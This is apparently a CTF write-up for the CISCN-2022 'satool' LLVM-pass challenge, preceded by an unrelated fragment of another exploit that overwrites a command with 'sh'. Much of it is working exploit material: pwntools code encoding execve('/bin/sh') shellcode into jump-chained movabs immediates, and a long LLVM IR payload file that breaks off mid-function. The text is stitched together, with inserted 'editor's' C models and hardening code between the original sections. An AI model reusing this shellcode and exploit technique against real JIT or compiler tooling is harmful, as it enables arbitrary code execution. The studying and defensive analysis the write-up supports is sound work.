void trunk234(int x){return;}
void trunk235(int x){return;}
void trunk236(int x){return;}
void trunk237(int x){return;}
void trunk238(int x){return;}
void trunk239(int x){return;}
void trunk240(int x){return;}
void trunk241(int x){return;}
void trunk242(int x){return;}
void trunk243(int x){return;}
void trunk244(int x){return;}
void trunk245(int x){return;}
void trunk246(int x){return;}
void trunk247(int x){return;}
void trunk248(int x){return;}
void trunk249(int x){return;}
void trunk250(int x){return;}
void trunk251(int x){return;}
void trunk252(int x){return;}
void trunk253(int x){return;}
void trunk254(int x){return;}
void trunk255(int x){return;}
void gamestart()
{
trunk000(0);
trunk001(0);
trunk002(0);
trunk003(0);
trunk004(0);
trunk005(0);
trunk006(0);
trunk007(0);
trunk008(0);
trunk009(0);
trunk010(0);
trunk011(0);
trunk012(0);
trunk013(0);
trunk014(0);
trunk015(0);
trunk016(0);
trunk017(0);
trunk018(0);
trunk019(0);
trunk020(0);
trunk021(0);
trunk022(0);
trunk023(0);
trunk024(0);
trunk025(0);
trunk026(0);
trunk027(0);
trunk028(0);
trunk029(0);
trunk030(0);
trunk031(0);
trunk032(0);
trunk033(0);
trunk034(0);
trunk035(0);
trunk036(0);
trunk037(0);
trunk038(0);
trunk039(0);
trunk040(0);
trunk041(0);
trunk042(0);
trunk043(0);
trunk044(0);
trunk045(0);
trunk046(0);
trunk047(0);
trunk048(0);
trunk049(0);
trunk050(0);
trunk051(0);
trunk052(0);
trunk053(0);
trunk054(0);
trunk055(0);
trunk056(0);
trunk057(0);
trunk058(0);
trunk059(0);
trunk060(0);
trunk061(0);
trunk062(0);
trunk063(0);
trunk064(0);
trunk065(0);
trunk066(0);
trunk067(0);
trunk068(0);
trunk069(0);
trunk070(0);
trunk071(0);
trunk072(0);
trunk073(0);
trunk074(0);
trunk075(0);
trunk076(0);
trunk077(0);
trunk078(0);
trunk079(0);
trunk080(0);
trunk081(0);
trunk082(0);
trunk083(0);
trunk084(0);
trunk085(0);
trunk086(0);
trunk087(0);
trunk088(0);
trunk089(0);
trunk090(0);
trunk091(0);
trunk092(0);
trunk093(0);
trunk094(0);
trunk095(0);
trunk096(0);
trunk097(0);
trunk098(0);
trunk099(0);
trunk100(0);
trunk101(0);
trunk102(0);
trunk103(0);
trunk104(0);
trunk105(0);
trunk106(0);
trunk107(0);
trunk108(0);
trunk109(0);
trunk110(0);
trunk111(0);
trunk112(0);
trunk113(0);
trunk114(0);
trunk115(0);
trunk116(0);
trunk117(0);
trunk118(0);
trunk119(0);
trunk120(0);
trunk121(0);
trunk122(0);
trunk123(0);
trunk124(0);
trunk125(0);
trunk126(0);
trunk127(0);
trunk128(0);
trunk129(0);
trunk130(0);
trunk131(0);
trunk132(0);
trunk133(0);
trunk134(0);
trunk135(0);
trunk136(0);
trunk137(0);
trunk138(0);
trunk139(0);
trunk140(0);
trunk141(0);
trunk142(0);
trunk143(0);
trunk144(0);
trunk145(0);
trunk146(0);
trunk147(0);
trunk148(0);
trunk149(0);
trunk150(0);
trunk151(0);
trunk152(0);
trunk153(0);
trunk154(0);
trunk155(0);
trunk156(0);
trunk157(0);
trunk158(0);
trunk159(0);
trunk160(0);
trunk161(0);
trunk162(0);
trunk163(0);
trunk164(0);
trunk165(0);
trunk166(0);
trunk167(0);
trunk168(0);
trunk169(0);
trunk170(0);
trunk171(0);
trunk172(0);
trunk173(0);
trunk174(0);
trunk175(0);
trunk176(0);
trunk177(0);
trunk178(0);
trunk179(0);
trunk180(0);
trunk181(0);
trunk182(0);
trunk183(0);
trunk184(0);
trunk185(0);
trunk186(0);
trunk187(0);
trunk188(0);
trunk189(0);
trunk190(0);
trunk191(0);
trunk192(0);
trunk193(0);
trunk194(0);
trunk195(0);
trunk196(0);
trunk197(0);
trunk198(0);
trunk199(0);
trunk200(0);
trunk201(0);
trunk202(0);
trunk203(0);
trunk204(0);
trunk205(0);
trunk206(0);
trunk207(0);
trunk208(0);
trunk209(0);
trunk210(0);
trunk211(0);
trunk212(0);
trunk213(0);
trunk214(0);
trunk215(0);
trunk216(0);
trunk217(0);
trunk218(0);
trunk219(0);
trunk220(0);
trunk221(0);
trunk222(0);
trunk223(0);
trunk224(0);
trunk225(0);
trunk226(0);
trunk227(0);
trunk228(0);
trunk229(0);
trunk230(0);
trunk231(0);
// overwrite cmd with 0x6EFDAD (sh)
trunk232(0xad);
trunk233(0xfd);
trunk234(0x6e);
trunk235(0);
trunk236(0);
trunk237(0);
trunk238(0);
trunk239(0);
trunk240(0);
// overwrite score
trunk241(0);
trunk242(0x40);
trunk243(0);
trunk244(0);
trunk245(0);
trunk246(0);
trunk247(0);
trunk248(0);
trunk249(0);
trunk250(0);
trunk251(0);
trunk252(0);
trunk253(0);
trunk254(0);
trunk255(0);
trunk241(0);
trunk242(0);
trunk243(0);
trunk244(0);
upgrade(0xFF);
fight(0);
}
CISCN-2022 satool
This one is genuinely hard. The vulnerability itself is not difficult to understand; the hard part is how the shellcode gets written in. For now I can only follow other people's write-ups to write the script; even knowing the idea, it would be hard to complete it from scratch myself, so I will first record the idea and the vulnerability.
Program analysis
The analysis centres on handle; by the look of it, this challenge is exploited with shellcode.
readme
## Introduction
An LLVM Pass that can optimize add/sub instructions.
## How to run
opt-12 -load ./mbaPass.so -mba {*.bc/*.ll} -S
## Example
### IR before optimization
```
define dso_local i64 @foo(i64 %0) local_unnamed_addr #0 {
%2 = sub nsw i64 %0, 2
%3 = add nsw i64 %2, 68
%4 = add nsw i64 %0, 6
%5 = add nsw i64 %4, -204
%6 = add nsw i64 %5, %3
ret i64 %6
}
```
### IR after optimization
```
define dso_local i64 @foo(i64 %0) local_unnamed_addr #0 {
%2 = mul i64 %0, 2
%3 = add i64 %2, -132
ret i64 %3
}
```
The handle function
This function processes the instructions in reverse order, which can be seen from the code and also by writing a small test file (based on the readme):
```llvm
; ModuleID = 'poc.c'
source_filename = "poc.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-pc-linux-gnu"
; Function Attrs: noinline nounwind optnone uwtable
define dso_local i64 @main(i64 %0) #0 {
  %2 = add nsw i64 %0, 286331153
  %3 = add nsw i64 %2, 572662306
  ret i64 %3                      ; terminator required for opt to accept the block
}
attributes #0 = { noinline nounwind optnone uwtable "correctly-rounded-divide-sqrt-fp-math"="false" "disable-tail-calls"="false" "frame-pointer"="all" "less-precise-fpmad"="false" "min-legal-vector-width"="0" "no-infs-fp-math"="false" "no-jump-tables"="false" "no-nans-fp-math"="false" "no-signed-zeros-fp-math"="false" "no-trapping-math"="false" "stack-protector-buffer-size"="8" "target-cpu"="x86-64" "target-features"="+cx8,+fxsr,+mmx,+sse,+sse2,+x87" "unsafe-fp-math"="false" "use-soft-float"="false" }
!llvm.module.flags = !{!0}
!llvm.ident = !{!1}
!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.0-4ubuntu1 "}
```
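An added example (editor's code, not the mbaPass source): a small C model of the add/sub folding the readme shows. Each value is kept as coef * %0 + cst, and the chain is walked from the last instruction back towards the argument, which is the reverse-order processing noted above. The types and names are assumptions; the input is the readme's "IR before optimization", indexed by SSA number.

```c
#include <stdint.h>

/* Constructed model of folding a chain of add/sub over one argument (%0)
 * into the linear form coef * %0 + cst. Types and names are the editor's. */
typedef enum { OP_ADD, OP_SUB } op_t;
typedef enum { OPND_CONST, OPND_ARG, OPND_REF } kind_t;

typedef struct {
    kind_t  kind;
    int64_t val;      /* constant value, or the %N index of a referenced instruction */
} opnd_t;

typedef struct { op_t op; opnd_t lhs, rhs; } inst_t;
typedef struct { int64_t coef, cst; } lin_t;   /* value = coef * %0 + cst */

lin_t fold(const inst_t *insts, int64_t idx);

static lin_t eval_opnd(const inst_t *insts, opnd_t o)
{
    switch (o.kind) {
    case OPND_CONST: return (lin_t){ 0, o.val };   /* pure constant            */
    case OPND_ARG:   return (lin_t){ 1, 0 };       /* the argument %0 itself   */
    default:         return fold(insts, o.val);    /* an earlier instruction %N */
    }
}

/* Fold instruction %idx into linear form, recursing backwards into its operands.
 * Arithmetic is plain int64 here; the real IR carries nsw, so overflow is
 * undefined there and would need a separate check in a production pass. */
lin_t fold(const inst_t *insts, int64_t idx)
{
    lin_t a = eval_opnd(insts, insts[idx].lhs);
    lin_t b = eval_opnd(insts, insts[idx].rhs);
    if (insts[idx].op == OP_ADD)
        return (lin_t){ a.coef + b.coef, a.cst + b.cst };
    return (lin_t){ a.coef - b.coef, a.cst - b.cst };
}

/* The readme's "IR before optimization", indexed by SSA number (%2..%6). */
lin_t fold_readme_example(void)
{
    inst_t insts[7] = {0};
    insts[2] = (inst_t){ OP_SUB, { OPND_ARG, 0 }, { OPND_CONST, 2 } };     /* %2 = sub %0, 2    */
    insts[3] = (inst_t){ OP_ADD, { OPND_REF, 2 }, { OPND_CONST, 68 } };    /* %3 = add %2, 68   */
    insts[4] = (inst_t){ OP_ADD, { OPND_ARG, 0 }, { OPND_CONST, 6 } };     /* %4 = add %0, 6    */
    insts[5] = (inst_t){ OP_ADD, { OPND_REF, 4 }, { OPND_CONST, -204 } };  /* %5 = add %4, -204 */
    insts[6] = (inst_t){ OP_ADD, { OPND_REF, 5 }, { OPND_REF, 3 } };       /* %6 = add %5, %3   */
    return fold(insts, 6);   /* {2, -132}: "mul %0, 2" then "add -132", as in the readme */
}
```

Starting from the final instruction and recursing into operands is what makes the walk run backwards through the function: the pass only ever needs the definition of an operand, never the instructions that come after the one it is folding.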
It is mainly an if / else if / else structure.
The first if checks whether the instruction's first operand is a constant.
The else if checks whether the instruction's first operand is a function argument.
If it is neither, execution enters the else.
Both the if and the else if branches append `movabs rax, <operand>` followed by `ret` to this, where the operand part takes up 6 bytes.
else
First the instruction `movabs rax, 0` is written, and the operand xxx of `i64 %xxx` (i.e. a variable) is placed into v26; then a while loop is entered.
while loop
It has two exit conditions: either the amount of data written exceeds 0xff0, or v26 holds no more data (i.e. each basic block is executed once); on exit a ret is written.
Inside the loop, two arguments are popped from the stack, the instruction line corresponding to the operand in v26 is located, its operator is checked and its two operands are taken out, and another if / else if / else is entered:
1. if: checks whether the instruction's first operand is ±1. If v18 * v22 is 1, the instruction inc rax is written, otherwise inc rbx. If the first operand is not ±1, the instruction movabs rbx, v18 * v22 is written.
2. else if: checks whether it is a function argument.
3. if: if it is neither a constant nor an argument, it is pushed onto the stack.
4. Then the second operand is handled: first whether the operation is an add or a sub is determined, and the rest is basically the same as above.
Debugging
Basically only two places receive our input.
The first: whenever the else branch is entered, `movabs rax, 0x0` is written (only once, on entry), and `ret` is written on exit.
The second is when the second operand is checked.
The result of the writes:
Vulnerability
It only checks 0xff0 bytes of data, but we can input 0x1000 bytes. In its initialisation the this[4] region holds a ret, which occupies only one byte, so even if every byte overflows the last one is still ret; but we can input a second `movabs rax, val`.
Shellcode
It is written inside `movabs rax, val`, where val is the 8 bytes we control.
The first input always ends with ret, but we can write a jmp into it; if the second input contains less data than the first, that jmp gets executed, and what follows is a series of jumps that adjust the position so that the shellcode is executed.
Where the shellcode is written:
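An added example (editor's C model, not the challenge code) of the reuse behaviour described above: a fixed emit region is written once with a longer body ending in ret and then again with a shorter one. Without clearing, the bytes of the first emission remain after the second ret, which is what lets a jmp placed in the first input survive into the second run. The hardened variant refills the region with int3 before each emission, so any stray control flow traps instead of executing leftovers, and refuses any write that would cross the 0xff0 limit. The sizes (0x1000 region, 0xff0 limit) follow the write-up; names, the per-write check and the int3 fill are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Constructed model of an emit region reused across functions. */
#define JIT_CAP   0x1000
#define JIT_LIMIT 0xff0
#define X86_RET   0xc3
#define X86_INT3  0xcc

typedef struct {
    uint8_t code[JIT_CAP];
    size_t  used;
} jit_t;

/* Append len bytes only if the whole write stays under JIT_LIMIT.
 * Returns the number of bytes written (0 when refused). */
static size_t jit_append(jit_t *j, const uint8_t *bytes, size_t len)
{
    if (len > JIT_LIMIT - j->used) return 0;
    memcpy(j->code + j->used, bytes, len);
    j->used += len;
    return len;
}

/* Challenge-style reuse: only the cursor is reset; old bytes stay in place. */
void jit_begin_unchecked(jit_t *j) { j->used = 0; }

/* Hardened reuse: fill the region with int3 before resetting the cursor. */
void jit_begin_cleared(jit_t *j) { memset(j->code, X86_INT3, JIT_CAP); j->used = 0; }

/* Emit n filler bytes followed by ret, the shape of one emitted function. */
static void jit_emit_body(jit_t *j, uint8_t filler, size_t n)
{
    uint8_t ret = X86_RET;
    for (size_t i = 0; i < n; i++) jit_append(j, &filler, 1);
    jit_append(j, &ret, 1);
}

/* First emission: 32 bytes of 0x90 then ret. Second, shorter emission: 8 bytes
 * then ret (at offset 8). Returns the byte right after the second ret (offset 9):
 * without clearing it is still 0x90 from the first emission. */
int demo_stale_tail(void)
{
    jit_t j;
    memset(&j, 0, sizeof j);
    jit_begin_unchecked(&j); jit_emit_body(&j, 0x90, 32);
    jit_begin_unchecked(&j); jit_emit_body(&j, 0x41, 8);
    return j.code[9];   /* 0x90 */
}

/* Same sequence with clearing: the byte after the second ret is int3. */
int demo_cleared_tail(void)
{
    jit_t j;
    memset(&j, 0, sizeof j);
    jit_begin_cleared(&j); jit_emit_body(&j, 0x90, 32);
    jit_begin_cleared(&j); jit_emit_body(&j, 0x41, 8);
    return j.code[9];   /* 0xcc */
}

/* A 10-byte movabs starting 8 bytes below the limit is refused because the
 * check covers the whole write, not just its first byte. Returns 0 (refused). */
size_t demo_limit_refuses_crossing(void)
{
    jit_t j;
    memset(&j, 0, sizeof j);
    j.used = JIT_LIMIT - 8;
    uint8_t movabs[10] = { 0x48, 0xb8, 0, 0, 0, 0, 0, 0, 0, 0 };   /* movabs rax, imm64 */
    return jit_append(&j, movabs, sizeof movabs);
}
```

For a real JIT region the int3 fill belongs together with W^X handling (write the bytes, then flip the page to executable), so that neither stale bytes nor a half-written instruction are ever reachable by a jump.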
Generating the shellcode
```python
from pwn import *
context(os='linux', arch='amd64')
shellcode = [
    "mov edi, 0x68732f6e",
    "shl rdi, 24",
    "mov ebx, 0x69622f",
    "add rdi, rbx",
    "push rdi",
    "push rsp",
    "pop rdi",
    "xor rsi, rsi",
    "xor rdx, rdx",
    "push 59",
    "pop rax",
    "syscall"
]
for sc in shellcode:
    # pad each instruction to 6 bytes with nop, then append the short jmp (EB EB)
    print(u64(asm(sc).ljust(6, b'\x90') + b'\xEB\xEB'))
print(u16(b'\xEB\xE4'))  # the jump instruction for the final part beyond 0xff0 bytes
```
exp
; ModuleID = 'exp.c'
source_filename = "exp.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-pc-linux-gnu"
; Function Attrs: noinline nounwind optnone uwtable
define dso_local i64 @payload1(i64 %0) #0 {
%2 = add nsw i64 %0, 58603
%3 = add nsw i64 %2, 1024
%4 = add nsw i64 %3, 1024
%5 = add nsw i64 %4, 1024
%6 = add nsw i64 %5, 1024
%7 = add nsw i64 %6, 1024
%8 = add nsw i64 %7, 1024
%9 = add nsw i64 %8, 1024
%10 = add nsw i64 %9, 1024
%11 = add nsw i64 %10, 1024
%12 = add nsw i64 %11, 1024
%13 = add nsw i64 %12, 1024
%14 = add nsw i64 %13, 1024
%15 = add nsw i64 %14, 1024
%16 = add nsw i64 %15, 1024
%17 = add nsw i64 %16, 1024
%18 = add nsw i64 %17, 1024
%19 = add nsw i64 %18, 1024
%20 = add nsw i64 %19, 1024
%21 = add nsw i64 %20, 1024
%22 = add nsw i64 %21, 1024
%23 = add nsw i64 %22, 1024
%24 = add nsw i64 %23, 1024
%25 = add nsw i64 %24, 1024
%26 = add nsw i64 %25, 1024
%27 = add nsw i64 %26, 1024
%28 = add nsw i64 %27, 1024
%29 = add nsw i64 %28, 1024
%30 = add nsw i64 %29, 1024
%31 = add nsw i64 %30, 1024
%32 = add nsw i64 %31, 1024
%33 = add nsw i64 %32, 1024
%34 = add nsw i64 %33, 1024
%35 = add nsw i64 %34, 1024
%36 = add nsw i64 %35, 1024
%37 = add nsw i64 %36, 1024
%38 = add nsw i64 %37, 1024
%39 = add nsw i64 %38, 1024
%40 = add nsw i64 %39, 1024
%41 = add nsw i64 %40, 1024
%42 = add nsw i64 %41, 1024
%43 = add nsw i64 %42, 1024
%44 = add nsw i64 %43, 1024
%45 = add nsw i64 %44, 1024
%46 = add nsw i64 %45, 1024
%47 = add nsw i64 %46, 1024
%48 = add nsw i64 %47, 1024
%49 = add nsw i64 %48, 1024
%50 = add nsw i64 %49, 1024
%51 = add nsw i64 %50, 1024
%52 = add nsw i64 %51, 1024
%53 = add nsw i64 %52, 1024
%54 = add nsw i64 %53, 1024
%55 = add nsw i64 %54, 1024
%56 = add nsw i64 %55, 1024
%57 = add nsw i64 %56, 1024
%58 = add nsw i64 %57, 1024
%59 = add nsw i64 %58, 1024
%60 = add nsw i64 %59, 1024
%61 = add nsw i64 %60, 1024
%62 = add nsw i64 %61, 1024
%63 = add nsw i64 %62, 1024
%64 = add nsw i64 %63, 1024
%65 = add nsw i64 %64, 1024
%66 = add nsw i64 %65, 1024
%67 = add nsw i64 %66, 1024
%68 = add nsw i64 %67, 1024
%69 = add nsw i64 %68, 1024
%70 = add nsw i64 %69, 1024
%71 = add nsw i64 %70, 1024
%72 = add nsw i64 %71, 1024
%73 = add nsw i64 %72, 1024
%74 = add nsw i64 %73, 1024
%75 = add nsw i64 %74, 1024
%76 = add nsw i64 %75, 1024
%77 = add nsw i64 %76, 1024
%78 = add nsw i64 %77, 1024
%79 = add nsw i64 %78, 1024
%80 = add nsw i64 %79, 1024
%81 = add nsw i64 %80, 1024
%82 = add nsw i64 %81, 1024
%83 = add nsw i64 %82, 1024
%84 = add nsw i64 %83, 1024
%85 = add nsw i64 %84, 1024
%86 = add nsw i64 %85, 1024
%87 = add nsw i64 %86, 1024
%88 = add nsw i64 %87, 1024
%89 = add nsw i64 %88, 1024
%90 = add nsw i64 %89, 1024
%91 = add nsw i64 %90, 1024
%92 = add nsw i64 %91, 1024
%93 = add nsw i64 %92, 1024
%94 = add nsw i64 %93, 1024
%95 = add nsw i64 %94, 1024
%96 = add nsw i64 %95, 1024
%97 = add nsw i64 %96, 1024
%98 = add nsw i64 %97, 1024
%99 = add nsw i64 %98, 1024
%100 = add nsw i64 %99, 1024
%101 = add nsw i64 %100, 1024
%102 = add nsw i64 %101, 1024
%103 = add nsw i64 %102, 1024
%104 = add nsw i64 %103, 1024
%105 = add nsw i64 %104, 1024
%106 = add nsw i64 %105, 1024
%107 = add nsw i64 %106, 1024
%108 = add nsw i64 %107, 1024
%109 = add nsw i64 %108, 1024
%110 = add nsw i64 %109, 1024
%111 = add nsw i64 %110, 1024
%112 = add nsw i64 %111, 1024
%113 = add nsw i64 %112, 1024
%114 = add nsw i64 %113, 1024
%115 = add nsw i64 %114, 1024
%116 = add nsw i64 %115, 1024
%117 = add nsw i64 %116, 1024
%118 = add nsw i64 %117, 1024
%119 = add nsw i64 %118, 1024
%120 = add nsw i64 %119, 1024
%121 = add nsw i64 %120, 1024
%122 = add nsw i64 %121, 1024
%123 = add nsw i64 %122, 1024
%124 = add nsw i64 %123, 1024
%125 = add nsw i64 %124, 1024
%126 = add nsw i64 %125, 1024
%127 = add nsw i64 %126, 1024
%128 = add nsw i64 %127, 1024
%129 = add nsw i64 %128, 1024
%130 = add nsw i64 %129, 1024
%131 = add nsw i64 %130, 1024
%132 = add nsw i64 %131, 1024
%133 = add nsw i64 %132, 1024
%134 = add nsw i64 %133, 1024
%135 = add nsw i64 %134, 1024
%136 = add nsw i64 %135, 1024
%137 = add nsw i64 %136, 1024
%138 = add nsw i64 %137, 1024
%139 = add nsw i64 %138, 1024
%140 = add nsw i64 %139, 1024
%141 = add nsw i64 %140, 1024
%142 = add nsw i64 %141, 1024
%143 = add nsw i64 %142, 1024
%144 = add nsw i64 %143, 1024
%145 = add nsw i64 %144, 1024
%146 = add nsw i64 %145, 1024
%147 = add nsw i64 %146, 1024
%148 = add nsw i64 %147, 1024
%149 = add nsw i64 %148, 1024
%150 = add nsw i64 %149, 1024
%151 = add nsw i64 %150, 1024
%152 = add nsw i64 %151, 1024
%153 = add nsw i64 %152, 1024
%154 = add nsw i64 %153, 1024
%155 = add nsw i64 %154, 1024
%156 = add nsw i64 %155, 1024
%157 = add nsw i64 %156, 1024
%158 = add nsw i64 %157, 1024
%159 = add nsw i64 %158, 1024
%160 = add nsw i64 %159, 1024
%161 = add nsw i64 %160, 1024
%162 = add nsw i64 %161, 1024
%163 = add nsw i64 %162, 1024
%164 = add nsw i64 %163, 1024
%165 = add nsw i64 %164, 1024
%166 = add nsw i64 %165, 1024
%167 = add nsw i64 %166, 1024
%168 = add nsw i64 %167, 1024
%169 = add nsw i64 %168, 1024
%170 = add nsw i64 %169, 1024
%171 = add nsw i64 %170, 1024
%172 = add nsw i64 %171, 1024
%173 = add nsw i64 %172, 1024
%174 = add nsw i64 %173, 1024
%175 = add nsw i64 %174, 1024
%176 = add nsw i64 %175, 1024
%177 = add nsw i64 %176, 1024
%178 = add nsw i64 %177, 1024
%179 = add nsw i64 %178, 1024
%180 = add nsw i64 %179, 1024
%181 = add nsw i64 %180, 1024
%182 = add nsw i64 %181, 1024
%183 = add nsw i64 %182, 1024
%184 = add nsw i64 %183, 1024
%185 = add nsw i64 %184, 1024
%186 = add nsw i64 %185, 1024
%187 = add nsw i64 %186, 1024
%188 = add nsw i64 %187, 1024
%189 = add nsw i64 %188, 1024
%190 = add nsw i64 %189, 1024
%191 = add nsw i64 %190, 1024
%192 = add nsw i64 %191, 1024
%193 = add nsw i64 %192, 1024
%194 = add nsw i64 %193, 1024
%195 = add nsw i64 %194, 1024
%196 = add nsw i64 %195, 1024
%197 = add nsw i64 %196, 1024
%198 = add nsw i64 %197, 1024
%199 = add nsw i64 %198, 1024
%200 = add nsw i64 %199, 1024
%201 = add nsw i64 %200, 1024
%202 = add nsw i64 %201, 1024
%203 = add nsw i64 %202, 1024
%204 = add nsw i64 %203, 1024
%205 = add nsw i64 %204, 1024
%206 = add nsw i64 %205, 1024
%207 = add nsw i64 %206, 1024
%208 = add nsw i64 %207, 1024
%209 = add nsw i64 %208, 1024
%210 = add nsw i64 %209, 1024
%211 = add nsw i64 %210, 1024
%212 = add nsw i64 %211, 1024
%213 = add nsw i64 %212, 1024
%214 = add nsw i64 %213, 1024
%215 = add nsw i64 %214, 1024
%216 = add nsw i64 %215, 1024
%217 = add nsw i64 %216, 1024
%218 = add nsw i64 %217, 1024
%219 = add nsw i64 %218, 1024
%220 = add nsw i64 %219, 1024
%221 = add nsw i64 %220, 1024
%222 = add nsw i64 %221, 1024
%223 = add nsw i64 %222, 1024
%224 = add nsw i64 %223, 1024
%225 = add nsw i64 %224, 1024
%226 = add nsw i64 %225, 1024
%227 = add nsw i64 %226, 1024
%228 = add nsw i64 %227, 1024
%229 = add nsw i64 %228, 1024
%230 = add nsw i64 %229, 1024
%231 = add nsw i64 %230, 1024
%232 = add nsw i64 %231, 1024
%233 = add nsw i64 %232, 1024
%234 = add nsw i64 %233, 1024
%235 = add nsw i64 %234, 1024
%236 = add nsw i64 %235, 1024
%237 = add nsw i64 %236, 1024
%238 = add nsw i64 %237, 1024
%239 = add nsw i64 %238, 1024
%240 = add nsw i64 %239, 1024
%241 = add nsw i64 %240, 1024
%242 = add nsw i64 %241, 1024
%243 = add nsw i64 %242, 1024
%244 = add nsw i64 %243, 1024
%245 = add nsw i64 %244, 1024
%246 = add nsw i64 %245, 1024
%247 = add nsw i64 %246, 1024
%248 = add nsw i64 %247, 1024
%249 = add nsw i64 %248, 1024
%250 = add nsw i64 %249, 1024
%251 = add nsw i64 %250, 1024
%252 = add nsw i64 %251, 1024
%253 = add nsw i64 %252, 1024
%254 = add nsw i64 %253, 1024
%255 = add nsw i64 %254, 1024
%256 = add nsw i64 %255, 1024
%257 = add nsw i64 %256, 1024
%258 = add nsw i64 %257, 1024
%259 = add nsw i64 %258, 1024
%260 = add nsw i64 %259, 1024
%261 = add nsw i64 %260, 1024
%262 = add nsw i64 %261, 1024
%263 = add nsw i64 %262, 1024
%264 = add nsw i64 %263, 1024
%265 = add nsw i64 %264, 1024
%266 = add nsw i64 %265, 1024
%267 = add nsw i64 %266, 1024
%268 = add nsw i64 %267, 1024
%269 = add nsw i64 %268, 1024
%270 = add nsw i64 %269, 1024
%271 = add nsw i64 %270, 1024
%272 = add nsw i64 %271, 1024
%273 = add nsw i64 %272, 1024
%274 = add nsw i64 %273, 1024
%275 = add nsw i64 %274, 1024
%276 = add nsw i64 %275, 1024
%277 = add nsw i64 %276, 1024
%278 = add nsw i64 %277, 1024
%279 = add nsw i64 %278, 1024
%280 = add nsw i64 %279, 1024
%281 = add nsw i64 %280, 1024
%282 = add nsw i64 %281, 1024
%283 = add nsw i64 %282, 1024
%284 = add nsw i64 %283, 1024
%285 = add nsw i64 %284, 1024
%286 = add nsw i64 %285, 1024
%287 = add nsw i64 %286, 1024
%288 = add nsw i64 %287, 1024
%289 = add nsw i64 %288, 1024
%290 = add nsw i64 %289, 1024
%291 = add nsw i64 %290, 1024
%292 = add nsw i64 %291, 1024
%293 = add nsw i64 %292, 1024
%294 = add nsw i64 %293, 1024
%295 = add nsw i64 %294, 1024
%296 = add nsw i64 %295, 1024
%297 = add nsw i64 %296, 1024
%298 = add nsw i64 %297, 1024
%299 = add nsw i64 %298, 1024
%300 = add nsw i64 %299, 1024
%301 = add nsw i64 %300, 1024
%302 = add nsw i64 %301, 1024
%303 = add nsw i64 %302, 1024
%304 = add nsw i64 %303, 1024
%305 = add nsw i64 %304, 1024
%306 = add nsw i64 %305, 1024
%307 = add nsw i64 %306, 1024
%308 = add nsw i64 %307, 1024
%309 = add nsw i64 %308, 1024
%310 = add nsw i64 %309, 1024
%311 = add nsw i64 %310, 1024
%312 = add nsw i64 %311, 1024
%313 = add nsw i64 %312, 1024
%314 = add nsw i64 %313, 1024
%315 = add nsw i64 %314, 1024
ret i64 %315
}
; Function Attrs: noinline nounwind optnone uwtable
define dso_local i64 @payload2(i64 %0) #0 {
%2 = add nsw i64 %0, 1
%3 = add nsw i64 %2, 1
%4 = add nsw i64 %3, 1
%5 = add nsw i64 %4, 1
%6 = add nsw i64 %5, 1
%7 = add nsw i64 %6, 16999839996723556031
%8 = add nsw i64 %7, 16999840167007600968
%9 = add nsw i64 %8, 16999839549882511291
%10 = add nsw i64 %9, 16999840169020293448
%11 = add nsw i64 %10, 16999840169015152727
%12 = add nsw i64 %11, 16999840169015152724
%13 = add nsw i64 %12, 16999840169015152735
%14 = add nsw i64 %13, 16999840169021813064
%15 = add nsw i64 %14, 16999840169019453768
%16 = add nsw i64 %15, 16999840169015130986
%17 = add nsw i64 %16, 16999840169015152728
%18 = add nsw i64 %17, 16999840169015117071
%19 = add nsw i64 %18, 1024
%20 = add nsw i64 %19, 1024
%21 = add nsw i64 %20, 1024
%22 = add nsw i64 %21, 1024
%23 = add nsw i64 %22, 1024
%24 = add nsw i64 %23, 1024
%25 = add nsw i64 %24, 1024
%26 = add nsw i64 %25, 1024
%27 = add nsw i64 %26, 1024
%28 = add nsw i64 %27, 1024
%29 = add nsw i64 %28, 1024
%30 = add nsw i64 %29, 1024
%31 = add nsw i64 %30, 1024
%32 = add nsw i64 %31, 1024
%33 = add nsw i64 %32, 1024
%34 = add nsw i64 %33, 1024
%35 = add nsw i64 %34, 1024
%36 = add nsw i64 %35, 1024
%37 = add nsw i64 %36, 1024
%38 = add nsw i64 %37, 1024
%39 = add nsw i64 %38, 1024
%40 = add nsw i64 %39, 1024
%41 = add nsw i64 %40, 1024
%42 = add nsw i64 %41, 1024
%43 = add nsw i64 %42, 1024
%44 = add nsw i64 %43, 1024
%45 = add nsw i64 %44, 1024
%46 = add nsw i64 %45, 1024
%47 = add nsw i64 %46, 1024
%48 = add nsw i64 %47, 1024
%49 = add nsw i64 %48, 1024
%50 = add nsw i64 %49, 1024
%51 = add nsw i64 %50, 1024
%52 = add nsw i64 %51, 1024
%53 = add nsw i64 %52, 1024
%54 = add nsw i64 %53, 1024
%55 = add nsw i64 %54, 1024
%56 = add nsw i64 %55, 1024
%57 = add nsw i64 %56, 1024
%58 = add nsw i64 %57, 1024
%59 = add nsw i64 %58, 1024
%60 = add nsw i64 %59, 1024
%61 = add nsw i64 %60, 1024
%62 = add nsw i64 %61, 1024
%63 = add nsw i64 %62, 1024
%64 = add nsw i64 %63, 1024
%65 = add nsw i64 %64, 1024
%66 = add nsw i64 %65, 1024
%67 = add nsw i64 %66, 1024
%68 = add nsw i64 %67, 1024
%69 = add nsw i64 %68, 1024
%70 = add nsw i64 %69, 1024
%71 = add nsw i64 %70, 1024
%72 = add nsw i64 %71, 1024
%73 = add nsw i64 %72, 1024
%74 = add nsw i64 %73, 1024
%75 = add nsw i64 %74, 1024
%76 = add nsw i64 %75, 1024
%77 = add nsw i64 %76, 1024
%78 = add nsw i64 %77, 1024
%79 = add nsw i64 %78, 1024
%80 = add nsw i64 %79, 1024
%81 = add nsw i64 %80, 1024
%82 = add nsw i64 %81, 1024
%83 = add nsw i64 %82, 1024
%84 = add nsw i64 %83, 1024
%85 = add nsw i64 %84, 1024
%86 = add nsw i64 %85, 1024
%87 = add nsw i64 %86, 1024
%88 = add nsw i64 %87, 1024
%89 = add nsw i64 %88, 1024
%90 = add nsw i64 %89, 1024
%91 = add nsw i64 %90, 1024
%92 = add nsw i64 %91, 1024
%93 = add nsw i64 %92, 1024
%94 = add nsw i64 %93, 1024
%95 = add nsw i64 %94, 1024
%96 = add nsw i64 %95, 1024
%97 = add nsw i64 %96, 1024
%98 = add nsw i64 %97, 1024
%99 = add nsw i64 %98, 1024
